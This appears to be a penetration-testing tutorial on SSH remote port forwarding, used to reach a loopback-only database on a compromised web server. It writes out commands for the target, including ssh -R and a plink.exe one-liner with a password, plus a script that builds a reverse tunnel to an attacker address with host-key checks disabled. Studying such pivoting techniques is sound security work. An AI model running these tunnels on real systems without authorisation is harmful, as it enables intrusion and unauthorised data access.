SSH remote port forwarding opens a listener on the SSH server and forwards whatever connects to it back through the SSH client to a destination the client can reach. This is useful when, for example, a database port on a compromised web server is bound to the loopback interface (127.0.0.1) only: the attacker has the web server machine SSH back to the attacker machine with a remote forward, and the database port then becomes reachable through the listener on the attacker machine.

Note: If access to the entire remote network is needed, see SSH dynamic port forwarding.

Example

Setup starts with “Web on 80” on the Target Machine (solid arrows), and practical usage starts with the MySQL Client on the Local Machine (dotted arrows).

graph TD
    subgraph Target Machine
        r80[[Web on 80]] -->|RCE| sshclient[SSH Client]
        r3306[[SQL on 3306]]
    end

    subgraph Local Machine
        l22[[SSH on 22]] --->|creates| listener[[Listener]]
        mysql[MySQL Client] -.->|connects to| listener
    end

    sshclient -->|portfwd setup| l22
    listener -.-> |forward over SSH|r3306

How-to

Run on rhost (the target, where the SSH client lives). This allows lhost (the attacker machine running sshd) to reach rport, which may be listening on rhost’s loopback interface only. -N sets up the forward without requesting a shell:

ssh -N -R lhost:lport:127.0.0.1:rport luser@lhost

Note: the bind address given to -R (lhost above) is honored only if sshd on lhost has GatewayPorts set to yes or clientspecified. With the default (no), the listener is bound to loopback on lhost regardless, which is sufficient as long as the client (e.g. mysql) runs on lhost itself.

On Windows, use plink.exe (again, local = attacker machine):

cmd.exe /c echo y | plink.exe -ssh -N -l LUSER -pw PASSWORD -R LHOST:LPORT:127.0.0.1:RPORT LHOST

A piped “y” is needed because plink.exe prompts to cache the SSH host key on first connection, and that prompt cannot be answered from a non-interactive shell. Note that -batch would not help here: it disables all interactive prompts, so plink abandons the connection instead of accepting an unknown host key.
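The following is an added example, not code from the original page: a small POSIX sh script that builds the reverse-forward command to paste into the RCE on the target, and a check for the attacker side that reads ss -ltn output and reports where sshd actually bound the forwarded port. The user name luser, the attacker address 10.10.14.5, the ports 3307/3306, and the ss output are all constructed for the example. It deliberately leaves the bind address off -R (see the GatewayPorts note above) and uses OpenSSH options to get past the host-key prompt in a non-interactive shell, the same problem the piped “y” solves for plink.

```shell
#!/bin/sh
# Added example, not from the original page. Builds the reverse-forward
# command to run on the target and checks, from constructed `ss -ltn` output,
# where sshd bound the forwarded port. Hosts and ports are made up.

# Command for the target (rhost). -N: no shell, just the forward.
# ExitOnForwardFailure: exit instead of silently continuing when lport cannot
# be bound on the attacker box. ServerAliveInterval: keep the tunnel alive
# across NAT/idle timeouts. The two host-key options are the OpenSSH
# equivalent of piping "y" into plink: no prompt in a non-interactive shell
# (at the cost of not verifying the host key of the attacker's own box).
# The bind address is left off -R on purpose: unless sshd on lhost has
# GatewayPorts yes/clientspecified it is ignored and the listener lands on
# loopback anyway, which is all a client running on lhost needs.
reverse_forward_cmd() {
  luser=$1 lhost=$2 lport=$3 rport=$4
  printf 'ssh -N -o ExitOnForwardFailure=yes -o ServerAliveInterval=30 -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -R %s:127.0.0.1:%s %s@%s\n' \
    "$lport" "$rport" "$luser" "$lhost"
}

# Attacker side: read `ss -ltn` output on stdin and print the address the
# forwarded port is bound to, or "none" if sshd did not open the listener
# (e.g. lport already in use). 127.0.0.1 means it is reachable only from
# lhost itself; 0.0.0.0 means GatewayPorts exposed it to the network.
listener_bind_addr() {
  awk -v p=":$1" '
    $1 == "LISTEN" {
      n = split($4, a, ":")
      if ((":" a[n]) == p) { sub(p "$", "", $4); print $4; found = 1; exit }
    }
    END { if (!found) print "none" }'
}

# Constructed sample of `ss -ltn` on the attacker machine after the tunnel
# is up (not real output): lport 3307 bound to loopback by sshd.
SAMPLE_SS='State  Recv-Q Send-Q Local Address:Port  Peer Address:Port
LISTEN 0      128    127.0.0.1:3307      0.0.0.0:*
LISTEN 0      128    0.0.0.0:22          0.0.0.0:*'

# Run the listener check over the constructed sample for a given lport.
check_sample() {
  printf '%s\n' "$SAMPLE_SS" | listener_bind_addr "$1"
}

# Demo: the command to run on the target, then the attacker-side check.
reverse_forward_cmd luser 10.10.14.5 3307 3306
echo "lport 3307 bound to: $(check_sample 3307)"
echo "lport 3308 bound to: $(check_sample 3308)"
```

Once the listener shows up on 127.0.0.1:3307, connect from the attacker machine with mysql -h 127.0.0.1 -P 3307 -u USER -p; giving -h 127.0.0.1 explicitly matters, because a bare mysql would try the local UNIX socket rather than the forwarded TCP port.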